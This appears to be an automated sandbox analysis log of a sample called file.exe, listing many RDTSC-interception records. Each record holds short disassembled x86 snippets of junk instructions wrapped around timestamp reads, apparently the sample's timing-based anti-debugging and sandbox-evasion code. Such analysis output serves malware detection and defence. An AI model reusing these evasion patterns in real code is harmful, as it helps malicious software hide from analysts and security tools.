Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1208FA5 second address: 1208FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F99150F9509h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+124848F3h], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F99150F94F8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D190Eh] 0x00000036 push 00000000h 0x00000038 xchg eax, esi 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1208FFA second address: 1208FFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120C18F second address: 120C1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F99150F9508h 0x0000000c mov edi, dword ptr [ebp+122D1C1Dh] 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+12453971h], edx 0x0000001a mov edi, dword ptr [ebp+122D188Eh] 0x00000020 push 00000000h 0x00000022 and edi, dword ptr [ebp+122D3886h] 0x00000028 xchg eax, esi 0x00000029 jmp 00007F99150F9508h 0x0000002e push eax 0x0000002f push ebx 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1208258 second address: 12082E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D33E8h], eax 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F99146B4598h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 pushad 0x00000034 pushad 0x00000035 mov edi, dword ptr [ebp+12456DC0h] 0x0000003b popad 0x0000003c mov dword ptr [ebp+12477350h], edx 0x00000042 popad 0x00000043 mov dword ptr fs:[00000000h], esp 0x0000004a movzx edi, cx 0x0000004d mov eax, dword ptr [ebp+122D0605h] 0x00000053 jng 00007F99146B459Ch 0x00000059 mov edi, dword ptr [ebp+122D197Eh] 0x0000005f mov dword ptr [ebp+122D1C6Ch], edi 0x00000065 push FFFFFFFFh 0x00000067 or di, 5BA0h 0x0000006c push eax 0x0000006d pushad 0x0000006e jmp 00007F99146B459Bh 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12082E4 second address: 12082E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120B1D9 second address: 120B1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120723B second address: 120723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120723F second address: 1207243 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1207243 second address: 120724D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120724D second address: 1207251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120F26B second address: 120F27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F99150F94F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120F27A second address: 120F284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F99146B4596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120F284 second address: 120F28A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120F872 second address: 120F878 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120F878 second address: 120F8FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99150F9507h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F99150F94F8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 jmp 00007F99150F94FBh 0x00000029 push 00000000h 0x0000002b sub dword ptr [ebp+122D1B06h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F99150F94F8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d and edi, dword ptr [ebp+122D37BEh] 0x00000053 push eax 0x00000054 pushad 0x00000055 pushad 0x00000056 pushad 0x00000057 popad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120FA1D second address: 120FA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B459Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120FA31 second address: 120FAC1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99150F94FCh 0x00000008 jo 00007F99150F94F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F99150F94F8h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ebx, eax 0x0000002f mov edi, edx 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f or ebx, 6340E451h 0x00000045 mov eax, dword ptr [ebp+122D02BDh] 0x0000004b push 00000000h 0x0000004d push ecx 0x0000004e call 00007F99150F94F8h 0x00000053 pop ecx 0x00000054 mov dword ptr [esp+04h], ecx 0x00000058 add dword ptr [esp+04h], 0000001Ch 0x00000060 inc ecx 0x00000061 push ecx 0x00000062 ret 0x00000063 pop ecx 0x00000064 ret 0x00000065 push FFFFFFFFh 0x00000067 push esi 0x00000068 jmp 00007F99150F9500h 0x0000006d pop ebx 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120FAC1 second address: 120FACB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99146B4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120FACB second address: 120FAD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 120FAD1 second address: 120FAD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A4495 second address: 11A44B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99150F9509h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A44B4 second address: 11A44BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A44BC second address: 11A44C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A44C2 second address: 11A44C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11A44C8 second address: 11A4519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F99150F94F6h 0x0000000a popad 0x0000000b push eax 0x0000000c jg 00007F99150F94F6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 jmp 00007F99150F9505h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d ja 00007F99150F9502h 0x00000023 jmp 00007F99150F9502h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220654 second address: 122065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220C16 second address: 1220C33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F9509h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220D6C second address: 1220D89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220D89 second address: 1220D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220D8F second address: 1220DC2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99146B459Ch 0x00000008 jne 00007F99146B4596h 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F99146B45ADh 0x0000001c jmp 00007F99146B45A7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220DC2 second address: 1220DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1220F23 second address: 1220F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221213 second address: 122122F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F99150F9504h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221457 second address: 122146D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F99146B4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F99146B459Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122146D second address: 1221472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12215FF second address: 1221605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221605 second address: 122160B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122160B second address: 1221619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F99146B4596h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221619 second address: 1221627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F99150F94F6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1221627 second address: 122162D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122162D second address: 122163D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12217D7 second address: 12217EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F99146B4596h 0x0000000a pop eax 0x0000000b popad 0x0000000c jnp 00007F99146B45B6h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12217EC second address: 12217FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F99150F94F6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12217FB second address: 12217FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12217FF second address: 1221803 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1225D3F second address: 1225D4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1225D4E second address: 1225D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jns 00007F99150F94F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226380 second address: 122638B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F99146B4596h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122638B second address: 12263B4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F99150F94FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F99150F9505h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122650B second address: 1226515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F99146B4596h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226949 second address: 1226950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226950 second address: 1226972 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99146B45B4h 0x00000008 jmp 00007F99146B45A8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226D5F second address: 1226D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1226D65 second address: 1226D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0588 second address: 11F0593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0593 second address: 11F05CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F99146B459Eh 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007F99146B45ADh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F05CE second address: 11F05FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jns 00007F99150F9504h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F080D second address: 11F0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F0EB8 second address: 11F0ECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99150F94FEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1017 second address: 11F108C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B459Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F99146B45A6h 0x00000011 mov edx, edi 0x00000013 lea eax, dword ptr [ebp+124849CDh] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F99146B4598h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dx, di 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F99146B45A7h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F108C second address: 11F1093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11F1093 second address: 11D8841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F99146B4598h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jnc 00007F99146B459Fh 0x0000002a call dword ptr [ebp+122D181Ch] 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8841 second address: 11D8845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8845 second address: 11D887B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F99146B45ADh 0x0000000e jmp 00007F99146B45A5h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007F99146B45A2h 0x0000001e jbe 00007F99146B4596h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D887B second address: 11D887F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D887F second address: 11D8896 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A2h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11D8896 second address: 11D889C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A892 second address: 122A896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122A896 second address: 122A89A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AA30 second address: 122AA36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AA36 second address: 122AA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 jg 00007F99150F94F6h 0x0000000c jng 00007F99150F94F6h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AA49 second address: 122AA7F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99146B45AFh 0x00000008 jnc 00007F99146B4596h 0x0000000e jmp 00007F99146B45A3h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F99146B45A3h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122ABDB second address: 122ABE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122ABE4 second address: 122ABF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99146B45A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122ABF8 second address: 122ABFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AD6D second address: 122ADA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99146B45A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F99146B45A0h 0x00000013 popad 0x00000014 pushad 0x00000015 jbe 00007F99146B4596h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122AF26 second address: 122AF30 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F99150F94F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1232CFD second address: 1232D17 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F99146B4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 js 00007F99146B45B3h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1232D17 second address: 1232D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99150F9507h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F99150F9505h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1232D4B second address: 1232D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1232EEA second address: 1232F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99150F9509h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 123307B second address: 1233081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233081 second address: 1233085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233085 second address: 123308F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99146B4596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233C1E second address: 1233C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1233C24 second address: 1233C2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
